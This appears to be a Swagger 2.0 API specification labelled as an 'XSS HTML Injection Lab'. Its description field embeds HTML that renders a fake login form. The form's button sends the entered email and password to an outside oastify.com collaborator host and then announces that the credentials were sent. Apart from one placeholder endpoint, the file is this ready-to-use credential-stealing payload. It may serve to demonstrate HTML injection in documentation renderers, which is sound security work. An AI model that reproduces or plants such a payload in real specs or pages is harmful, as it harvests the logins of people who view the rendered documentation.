swagger: '2.0'
info:
  title: XSS HTML Injection Lab
  description: |
    <h1>Lab Login</h1>
    <label for="email">Email:</label><input id="email"><br>
    <label for="password">Password:</label><input id="password" type="password"><br>
    <button onclick="
      fetch('http://t71jknrq6oy3949z9e3lcndik9q0eq2f.oastify.com', {
        method: 'POST',
        mode: 'no-cors',
        body: new URLSearchParams({
          email: document.getElementById('email').value,
          password: document.getElementById('password').value
        })
      });
      alert('Thanks! Credentials sent.');
    ">Login</button>
  version: lab
basePath: /
paths:
  /test:
    get:
      summary: test
      responses:
        '200':
          description: ok
